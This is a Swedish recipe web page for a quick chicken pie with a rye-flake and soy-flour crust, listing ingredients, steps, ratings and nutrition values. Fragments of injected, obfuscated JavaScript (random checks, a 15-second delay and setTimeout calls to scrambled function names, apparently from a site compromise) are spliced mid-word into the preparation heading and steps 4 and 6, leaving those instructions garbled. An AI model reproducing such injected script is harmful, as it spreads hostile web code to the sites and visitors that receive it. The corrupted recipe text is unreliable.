Kycklingpaj

2013-06-08
234mat
  • Yield : 1
  • Servings : 2
  • Prep Time : 10m
  • Cook Time : 35m
  • Ready In : 45m

Kycklingpaj

Detta är en enkel och nyttig kycklingpaj som går snabbt att slänga ihop. En perfekt måltid efter träning!

Ingredienser

Pajskal:

  • 1/2 dl Rågflingor
  • 1/2 dl Sojamjöl
  • 2 – 3 msk Kvarg

Fyllning:

  • 200 g Kycklingfärs
  • 1/2 Zucchini
  • 5 st Kastanjechampinjoner
  • 1/2 Tomat
  • 1 tsk Sambal Oelek
  • 1 liten vitlöksklyfta
  • Färska örter (t.ex. basilika & timjan)
  • 2 Ägg
  • 1 msk Kvarg

Genomförandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e

Steg 1

Sätt ugnen på 175 grader

Steg 2

Dela zucchinin, champinjonerna & tomaten i tärningar och fräs på dem i stekpannan tillsammans med kycklingfärsen. Smaksätt sedan färsen med sambal oelek, vitlök, färska örter samt salt och peppar efter smak.

Steg 3

Mixa rågflingorna och sojamjölet med en stavmixer så det blir till ett fint mjöl.

Steg 4

Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i kvargen så det får en degliknandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e konsistens.

Steg 5

Tryck ut degen i en form som är ca 8 x 8 cm. (Lägg gärna bakplåtspapper i botten så pajen blir lättare att få ut hel vid servering) och stoppa in den i ugnen i ca 10 minuter tills skalet har fått en lätt gyllenbrun yta.

Steg 6

Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a färsen med två hela ägg och 1 msk kvarg. Häll sedan röran över skalet, stoppa in den i ugnen och låt grädda i ca 15 minuter.

Steg 7

Servera gärna med en lätt sallad.

Medlemsbetyg

(4 / 5)

4 5 4
Betygsätt recept

4 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • _SAM0920

    Svartvitlöks rostad kyckling

  • Vitchoklad & hallonpudding

    Vitchoklad & hallonpudding

  • SAM_0426

    Lax stekt i svartvitlök, rotfrukts, spenatsallad med kapris och persiljekräm.

  • _SAM0388

    Entrecote med smörstekta rotfrukter i timjan & rostad potatis

Näringssinnehåll

Informationen gäller per portion

  • Kalorier

    410 kcal
  • Protein

    39 g
  • Kolhydrater

    17 g
  • Fett

    19 g

Recipe Comments

Post A Comment

Current ye@r *